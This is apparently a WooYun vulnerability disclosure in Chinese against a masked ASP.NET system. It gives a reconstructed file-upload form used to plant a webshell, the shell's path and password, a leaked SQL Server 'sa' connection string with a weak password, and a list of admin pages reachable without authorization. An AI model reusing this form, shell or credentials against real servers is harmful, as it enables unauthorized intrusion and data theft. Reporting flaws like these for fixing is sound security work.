WooYun.org

http://**.**.**.**/usl/ 首先是目录遍历
发现了http://**.**.**.**/usl/Api/%E5%89%AF%E6%9C%AC%20file.html
上传没有反应，然后看源码，然后重新构造了一下。
<!DOCTYPE html>
<html xmlns="http://**.**.**.**/1999/xhtml">
<head runat="server">
<title>无标题页</title>
<meta charset="utf-8" />

</head>
<body>
<form id="formData" action="http://**.**.**.**/usl/Api/UpLoadFile.aspx" method="post" enctype="multipart/form-data">
<input id="FileData" name="FileData" type="file" />
<input id="Submit1" type="submit" value="上传" /></form>
</body>
</html>
然后就getshell咯
http://**.**.**.**/Attachment/Att/ORG0/0/2015/10/Att_ORG0_0_2015_10_841646_66679.aspx F4ck
点到为止，不深入了哈。
<add name="RhConnStr" connectionString="Provider=SQLOLEDB;Data Source=**.**.**.**;Password=123456;User ID=sa;Initial Catalog=Interact"
一些越权
http://**.**.**.**/usl/Conf/User/FrameUser.aspx
http://**.**.**.**/usl/Conf/User/UserList.aspx
http://**.**.**.**/usl/Conf/User/UserNew.aspx
http://**.**.**.**/usl/Conf/Role/OrgUserBest/BestSelect.aspx
http://**.**.**.**/usl/Conf/Role/OrgUserBest/FrameOrgUserBest.aspx
http://**.**.**.**/usl/Conf/Role/RoleList.aspx
http://**.**.**.**/usl/Conf/Org/OrgEdit.aspx
http://**.**.**.**/usl/Conf/Org/OrgList.aspx
http://**.**.**.**/usl/Conf/Org/FrameOrg.aspx
http://**.**.**.**/usl/Conf/Org/OrgNew.aspx
http://**.**.**.**/usl/Conf/Org/OrgView.aspx
http://**.**.**.**/usl/Conf/NavRight/Vobs.aspx
http://**.**.**.**/usl/Conf/Dict/DictMan.aspx
http://**.**.**.**/usl/Conf/Dict/DictMove.aspx
http://**.**.**.**/usl/Conf/Dict/DictWordFilteList.aspx
http://**.**.**.**/usl/Conf/Dict/DictWordFilter.aspx
http://**.**.**.**/usl/Conf/Cust/CustEdit.aspx
http://**.**.**.**/usl/Conf/Cust/CustPwd.aspx
http://**.**.**.**/usl/Conf/Cust/CustView.aspx
http://**.**.**.**/Plugin/Merge/MergeDep.aspx
两处任意上传
http://**.**.**.**/usl/Api/file.html
http://**.**.**.**/usl/Api/index.html